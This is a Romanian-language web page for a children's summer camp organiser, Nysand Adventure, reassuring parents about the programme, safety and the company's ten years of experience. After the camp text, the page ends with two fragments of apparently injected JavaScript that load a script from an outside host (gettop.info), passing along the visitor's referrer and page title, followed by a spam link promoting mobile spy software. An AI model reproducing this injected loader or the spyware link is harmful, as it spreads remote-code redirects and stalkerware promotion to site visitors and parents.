Despre taberele noastre

Bine ați venit pe pagina noastră de tabere!

Știm cu toții că este foarte greu pentru parinți să-și lase copilul într-o tabără la care nu participă doamna învățatoare, profesoara sau diriginta, mai ales daca unii dintre dumneavoastră își trimit pentru prima oara copilul într-o tabără Nysand Adventure.

De aceea vă punem la dispoziție toate informațiile despre programul taberei, condițiile generale de participare, echipamentul necesar și documentele necesare înscrierii.

Aceste tabere sunt un loc ideal unde copilul dumneavoastră își va dezvolta simțul independenței, încrederea în forțele proprii, se va redescoperi și iși va face prieteni noi.

Cu o experiență de peste 10 ani în organizarea de tabere pentru copii vă garantăm participarea la o tabără reușită din toate punctele de vedere și care asigură copilului dumneavostră o experiență memorabilă, într-un cadru sigur, cu activități dintre cele mai interesante.

Vă mulțumim că ați ales Nysand Adventure!

s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; https://topspyapps.net – The most popular 2017 spy software applications for the mobile phones.